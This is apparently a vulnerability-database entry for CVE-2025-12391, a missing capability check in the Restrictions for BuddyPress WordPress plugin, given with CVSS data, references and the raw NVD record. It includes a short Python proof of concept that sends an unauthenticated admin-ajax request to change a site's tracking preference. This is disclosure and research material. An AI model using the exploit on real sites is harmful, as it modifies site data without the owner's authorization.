CVE-2025-12391

Description

The Restrictions for BuddyPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_optin_optout() function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to opt in and out of tracking.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Restrictions for BuddyPress插件 <= 1.5.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-12391 PoC - Unauthorized tracking preference modification
# Target: WordPress site with Restrictions for BuddyPress plugin <= 1.5.2

target_url = "http://target-wordpress-site.com"

# PoC to opt-out from tracking (set tracking preference to disabled)
payload = {
    'action': 'bp_restrict_optin_optout',
    'optin_optout': '0'  # 0 = opt-out, 1 = opt-in
}

try:
    # Send unauthenticated request to exploit the vulnerability
    response = requests.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        data=payload,
        timeout=10
    )
    
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    
    if response.status_code == 200:
        print("\n[+] PoC executed successfully - tracking preference may have been modified")
    else:
        print("\n[-] Request failed")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12391
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12391
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12391/
[4] VulDB https://vuldb.com/cve/CVE-2025-12391
[5] https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3468480%40bp-restrict&new=3468480%40bp-restrict&sfp_email=&sfph_mail=
[6] https://wordpress.org/plugins/bp-restrict/
[7] https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fe5ed7-17e2-4098-a51b-3b780721bf2e?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12391", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:47.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Restrictions for BuddyPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handle_optin_optout() function in all versions up to, and including, 1.5.2. This makes it possible for unauthenticated attackers to opt in and out of tracking."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3468480%40bp-restrict&new=3468480%40bp-restrict&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/bp-restrict/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4fe5ed7-17e2-4098-a51b-3b780721bf2e?source=cve", "source": "[email protected]"}]}}